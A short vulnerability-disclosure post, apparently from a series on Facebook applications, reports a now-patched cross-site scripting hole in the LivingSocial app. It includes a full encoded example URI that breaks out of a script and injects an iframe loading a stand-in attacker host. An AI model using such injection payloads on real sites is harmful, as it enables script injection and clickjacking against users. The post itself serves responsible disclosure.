I originally planned on posting a different application today, but since that hole remains unpatched, I decided to wait another day and simply move down the leaderboard with a vulnerability I found yesterday.
Facebook Verified Application
Current Monthly Active Users: 23,688,212
Current Rank on Application Leaderboard: 3
Application Developer: LivingSocial
Responsiveness: LivingSocial responded within half an hour to let me know the hole was patched.
Vulnerability Status: Patched
Capable of Clickjacking Install: Yes
Example URI: hxxp://apps.facebook.com/livingsocial/micro/ad_manager/t/frame?campaign=%22)%3B%3C%2Fscript%3E%3Cfb%3Aiframe+src%3D%22http%3A%2F%2Ffacebook.livingsocial.com%2Fmicro%2Fad_manager%2Ft%2Fframe%3Fcampaign%3D%2522)%253B%253C%252Fscript%253E%253Ciframe%2Bsrc%253D%2522http%253A%252F%252EVILURI%252F%2522%253E%253Cscript%253Ex%253D(%2522%22%3E%3Cscript%3Ex%3D(%22
Notes: This example serves as a reminder to leave no page unexamined when looking for vulnerabilities. The hijacked page is normally used in an iframe for serving ads within the application, but since it resides at the same location as the application itself, it can be accessed via apps.facebook.com to launch an attack.
Share with your friends!